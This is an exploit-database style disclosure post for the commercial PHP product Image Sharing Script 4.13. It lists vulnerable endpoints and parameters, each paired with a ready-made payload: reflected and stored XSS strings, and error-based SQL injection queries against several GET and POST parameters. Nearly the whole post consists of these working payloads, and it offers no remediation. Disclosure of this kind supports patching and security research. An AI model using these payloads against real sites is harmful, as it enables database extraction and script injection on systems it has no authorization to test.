Home / os / winmobile

Image Sharing Script 4.13 Cross Site Scripting / SQL Injection

Posted on 17 January 2017

Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability Author : Hasan Emre Ozer Google Dork : - Date : 16/01/2017 Type : webapps Platform: PHP Vendor Homepage : http://itechscripts.com/image-sharing-script/ Sofware Price and Demo : $1250 http://photo-sharing.itechscripts.com/ -------------------------------- Type: Reflected XSS Vulnerable URL: http://localhost/[PATH]/searchpin.php Vulnerable Parameters : q= Payload:"><img src=i onerror=prompt(1)> ------------------------------- Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php Vulnerable Parameters: pid Method: GET Payload: ' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH ------------------------------- Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/categorypage.php Vulnerable Parameters: token Method: GET Payload: ' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH -------------------------------- Type: Reflected XSS Vulnerable URL: http://localhost/[PATH]/categorypage.php Vulnerable Parameters : token Payload:"><img src=i onerror=prompt(1)> ------------------------------- Type: Stored XSS Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php Method: POST Vulnerable Parameters : &text= Payload:<img src=i onerror=prompt(1)> -------------------------------- Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php Vulnerable Parameters: id Method: POST Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH --------------------------------- Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php Vulnerable Parameters: brdId Method: POST Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH -- Best Regards, Hasan Emre

 

TOP